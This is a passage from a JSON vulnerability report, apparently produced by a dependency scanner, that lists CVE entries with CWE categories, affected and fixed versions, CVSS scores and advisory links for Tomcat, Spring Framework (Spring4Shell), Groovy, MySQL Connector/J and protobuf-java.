List","url":"https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"NetApp Advisory ntap-20200327-0005","url":"https://security.netapp.com/advisory/ntap-20200327-0005"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1935/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-45648"]}],"cve":"CVE-2023-45648","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-10-10T21:31:12","ids":[{"system_name":"CVE Record","text":"CVE-2023-45648"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat.  Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single  request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.  Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.  ## Related CVE(s) BIT-tomcat-2023-45648, CVE-2023-45648"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/10"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-45648"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-45648/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"Vmware","urls":["https://tanzu.vmware.com/security/cve-2022-22965"]}],"cve":"CVE-2022-22965","cwe":{"id":"74","name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component"},"discovery_date":"2022-03-31T18:30:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-22965"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2022-0005"},{"system_name":"Cisco Advisory","text":"cisco-sa-java-spring-rce-Zx9GUc67"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Vmware Advisory","text":"cve-2022-22965"},{"system_name":"Siemens Advisory","text":"ssa-254054"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Generation of Code","title":"Additional CWE: 94"},{"category":"description","details":"Vulnerability Description","text":"Remote Code Execution in Spring Framework"},{"category":"details","details":"Vulnerability Details","text":"# Remote Code Execution in Spring Framework Spring Framework prior to versions 5.2.20 and 5.3.18 contains a remote code execution vulnerability known as `Spring4Shell`.   ## Impact  A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.  These are the prerequisites for the exploit: - JDK 9 or higher - Apache Tomcat as the Servlet container - Packaged as WAR - `spring-webmvc` or `spring-webflux` dependency  ## Patches  - Spring Framework [5.3.18](https://github.com/spring-projects/spring-framework/releases/tag/v5.3.18) and [5.2.20](https://github.com/spring-projects/spring-framework/releases/tag/v5.2.20.RELEASE) - Spring Boot [2.6.6](https://github.com/spring-projects/spring-boot/releases/tag/v2.6.6) and [2.5.12](https://github.com/spring-projects/spring-boot/releases/tag/v2.5.12)  ## Workarounds  For those who are unable to upgrade, leaked reports recommend setting `disallowedFields` on `WebDataBinder` through an `@ControllerAdvice`. This works generally, but as a centrally applied workaround fix, may leave some loopholes, in particular if a controller sets `disallowedFields` locally through its own `@InitBinder` method, which overrides the global setting.  To apply the workaround in a more fail-safe way, applications could extend `RequestMappingHandlerAdapter` to update the `WebDataBinder` at the end after all other initialization. In order to do that, a Spring Boot application can declare a `WebMvcRegistrations` bean (Spring MVC) or a `WebFluxRegistrations` bean (Spring WebFlux)."}],"product_status":{"known_affected":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/166713/Spring4Shell-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/167011/Spring4Shell-Spring-Framework-Class-Property-Remote-Code-Execution.html"},{"summary":"Siemens Advisory ssa-254054","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-254054.pdf"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-22965"},{"summary":"Sonicwall Advisory SNWLID-2022-0005","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005"},{"summary":"Vmware Advisory cve-2022-22965","url":"https://tanzu.vmware.com/security/cve-2022-22965"},{"summary":"Cisco Advisory cisco-sa-java-spring-rce-Zx9GUc67","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-rce-Zx9GUc67"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.springframework/spring-webmvc@vers:maven/>=1.0|<=5.2.9.RELEASE"]}],"title":"CVE-2022-22965/pkg:maven/org.springframework/spring-webmvc@4.3.6.RELEASE?type=jar"},{"cve":"CVE-2020-17521","cwe":{"id":"379","name":"Creation of Temporary File in Directory with Insecure Permissions"},"discovery_date":"2020-12-09T19:03:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-17521"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201218-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Groovy"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Groovy Apache Groovy provides extension methods to aid with creating temporary directories. Prior to this fix, Groovy's implementation of those extension methods was using a now superseded Java JDK method call that is potentially not secure on some operating systems in some contexts. Users not using the extension methods mentioned in the advisory are not affected, but may wish to read the advisory for further details. Versions Affected: 2.0 to 2.4.20, 2.5.0 to 2.5.13, 3.0.0 to 3.0.6, and 4.0.0-alpha-1. Fixed in versions 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2."}],"product_status":{"known_affected":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"],"known_not_affected":["org.codehaus.groovy/groovy@2.4.21"]},"references":[{"summary":"Cve 2020","url":"https://groovy-lang.org/security.html#CVE-2020-17521"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4b2f13c302eec98838ff7475253091fb9b75bc1038016ba00ebf6c08@%3Cdev.atlas.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra9dab34bf8625511f23692ad0fcee2725f782e9aad6c5cdff6cf4465@%3Cnotifications.groovy.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea63a4666ba245d2892471307772a2d8ce0f0741f341d6576625c1b3@%3Cdev.atlas.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-17521"},{"summary":"NetApp Advisory ntap-20201218-0006","url":"https://security.netapp.com/advisory/ntap-20201218-0006"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.codehaus.groovy/groovy@vers:maven/>=2.0.0|<2.4.21"]}],"title":"CVE-2020-17521/pkg:maven/org.codehaus.groovy/groovy@2.4.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21363"]}],"cve":"CVE-2022-21363","cwe":{"id":"280","name":"Improper Handling of Insufficient Permissions or Privileges "},"discovery_date":"2022-01-20T00:00:48","ids":[{"system_name":"CVE Record","text":"CVE-2022-21363"},{"system_name":"Oracle Advisory","text":"cpujan2022"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java"},{"category":"details","details":"Vulnerability Details","text":"# Improper Handling of Insufficient Permissions or Privileges in MySQL Connectors Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21363"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=2.0.14|<=8.0.27"]}],"title":"CVE-2022-21363/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-2471"]}],"cve":"CVE-2021-2471","cwe":{"id":"863","name":"Incorrect Authorization"},"discovery_date":"2022-05-24T19:18:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-2471"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Incorrect Authorization in MySQL Connector Java"},{"category":"details","details":"Vulnerability Details","text":"# Incorrect Authorization in MySQL Connector Java Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H)."}],"product_status":{"known_affected":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"],"known_not_affected":["mysql/mysql-connector-java@8.0.27"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-2471"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H","version":"3.1"},"products":["mysql/mysql-connector-java@vers:maven/>=8.0.0|<8.0.27"]}],"title":"CVE-2021-2471/pkg:maven/mysql/mysql-connector-java@8.0.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-22570"]}],"cve":"CVE-2021-22570","cwe":{"id":"476","name":"NULL Pointer Dereference"},"discovery_date":"2022-01-27T00:01:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-22570"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"NetApp Advisory","text":"ntap-20220429-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"NULL Pointer Dereference in Protocol Buffers"},{"category":"details","details":"Vulnerability Details","text":"# NULL Pointer Dereference in Protocol Buffers Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater.  ## Related CVE(s) CVE-2021-22570, PYSEC-2022-48"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.15.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00019.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3DVUZPALAQ34TQP6KFNLM4IZS6B32XSA"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5PAGL5M2KGYPN3VEQCRJJE6NA7D5YG5X"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BTRGBRC5KGCA4SK5MUNLPYJRAGXMBIYY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IFX6KPNOFHYD6L4XES5PCM3QNSKZBOTQ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KQJB6ZPRLKV6WCMX2PRRRQBFAOXFBK6B"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRWRAXAFR3JR7XCFWTHC2KALSZKWACCE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NVTWVQRB5OCCTMKEQFY5MYED3DXDVSLP"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-22570"},{"summary":"NetApp Advisory ntap-20220429-0005","url":"https://security.netapp.com/advisory/ntap-20220429-0005"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2021-22570/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3510"]}],"cve":"CVE-2022-3510","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3510"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3510"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3510/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-3509"]}],"cve":"CVE-2022-3509","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-12-12T15:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2022-3509"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Protobuf Java vulnerable to Uncontrolled Resource Consumption"},{"category":"details","details":"Vulnerability Details","text":"# Protobuf Java vulnerable to Uncontrolled Resource Consumption A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above."}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"],"known_not_affected":["com.google.protobuf/protobuf-java@3.21.7"]},"references":[{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-3509"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]}],"title":"CVE-2022-3509/pkg:maven/com.google.protobuf/protobuf-java@2.6.0?type=jar"},{"acknowledgements":[{"organization":"GitHub","urls":["https://github.com/rubysec/ruby-advisory-db/blob/master/gems/google-protobuf/CVE-2022-3171.yml"]}],"cve":"CVE-2022-3171","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-10-04T22:17:15","ids":[{"system_name":"CVE Record","text":"CVE-2022-3171"},{"system_name":"GitHub Advisory","text":"GHSA-h4h5-3hr4-j3g2"},{"system_name":"Gentoo Advisory","text":"glsa-202301-09"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"protobuf-java has a potential Denial of Service issue"},{"category":"details","details":"Vulnerability Details","text":"# protobuf-java has a potential Denial of Service issue ## Summary A potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses.   Reporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)  Affected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.  ## Severity  [CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)  ## Remediation and Mitigation  Please update to the latest available versions of the following packages:  protobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3) protobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3) google-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)"}],"product_status":{"known_affected":["com.google.protobuf/protobuf-java@vers:maven/>=2.0.1|<=3.9.2"]},"references":[{"summary":"GitHub Advisory GHSA-h4h5-3hr4-j3g2","url":"https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-h4h5-3hr4-j3g2"},{"summary":"CVE 